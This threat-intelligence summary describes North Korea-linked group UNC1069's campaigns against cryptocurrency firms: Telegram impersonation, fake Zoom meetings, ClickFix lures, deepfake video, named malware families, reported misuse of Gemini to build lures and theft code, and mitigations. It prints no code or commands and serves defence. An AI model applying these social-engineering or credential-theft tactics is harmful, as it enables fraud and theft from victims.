Key Findings

• North Korea-linked threat actor UNC1069 has been observed targeting the cryptocurrency sector to steal sensitive data

• The intrusion relied on a social engineering scheme involving a compromised Telegram account, a fake Zoom meeting, a ClickFix infection vector, and reported usage of AI-generated video to deceive victims

• UNC1069 has a history of conducting social engineering campaigns for financial gain using fake meeting invites and posing as investors from reputable companies on Telegram

• The group has used generative AI tools like Gemini to produce lure material and other messaging related to cryptocurrency as part of its social engineering campaigns

• UNC1069 has been observed attempting to misuse Gemmini to develop code to steal cryptocurrency, as well as leverage deepfake images and video lures mimicking individuals in the cryptocurrency industry

Background

UNC1069, also tracked as CryptoCore and MASAN, is assessed to be active since at least April 2018 and has a history of targeting the financial sector, including the cryptocurrency industry, for financial gain. The threat actor is believed to be linked to North Korea.

Tactics, Techniques, and Procedures (TTPs)

1. Social Engineering via Telegram: UNC1069 approaches victims by impersonating venture capitalists or using compromised accounts of legitimate entrepreneurs and startup founders on Telegram.

2. Fake Zoom Meeting: The threat actor uses Calendly to schedule a 30-minute meeting with the victims, with the meeting link designed to redirect them to a fake website masquerading as Zoom.

3. ClickFix Infection Vector: Once the victim joins the fake Zoom meeting, they are displayed a screen that resembles an actual Zoom meeting. However, the victim's webcam footage is recorded and reused to deceive other victims, making them believe they are participating in a genuine live call. The victim is then prompted to download and run a ClickFix-style troubleshooting command to address a purported audio issue.

4. Malware Deployment: The ClickFix command leads to the delivery of malicious payloads, including:

• WAVESHAPER: A malicious C++ executable designed to gather system information and distribute additional payloads.

• HYPERCALL: A Go-based downloader used to serve follow-on payloads.

• HIDDENCALL: A Golang-based backdoor that provides hands-on keyboard access to the compromised system and deploys a Swift-based data miner called DEEPBREATH.

• SUGARLOADER: A C++ downloader used to deploy CHROMEPUSH.

• SILENCELIFT: A minimalist C/C++ backdoor that sends system information to a command-and-control (C2) server.

Targeted Data and Capabilities

• DEEPBREATH: Manipulates macOS's Transparency, Consent, and Control (TCC) database to steal iCloud Keychain credentials, and data from Google Chrome, Brave, and Microsoft Edge, Telegram, and Apple Notes.

• CHROMEPUSH: A data stealer deployed as a browser extension to Google Chrome and Brave browsers.

Mitigation Strategies

• Educate employees on social engineering tactics and maintain a heightened awareness of unsolicited meeting invites and requests to download and run software.

• Implement robust endpoint protection and network monitoring solutions to detect and block the deployment of the identified malware families.

• Regularly update and patch all software to mitigate known vulnerabilities that could be exploited by the threat actors.

• Encourage the use of secure communication channels, such as encrypted messaging apps, for sensitive business discussions.

Sources

• https://thehackernews.com/2026/02/north-korea-linked-unc1069-uses-ai.html

• https://x.com/TheCyberSecHub/status/2021483142713049478

• https://www.reddit.com/r/SecOpsDaily/comments/1r1rhfr/north_korealinked_unc1069_uses_ai_lures_to_attack/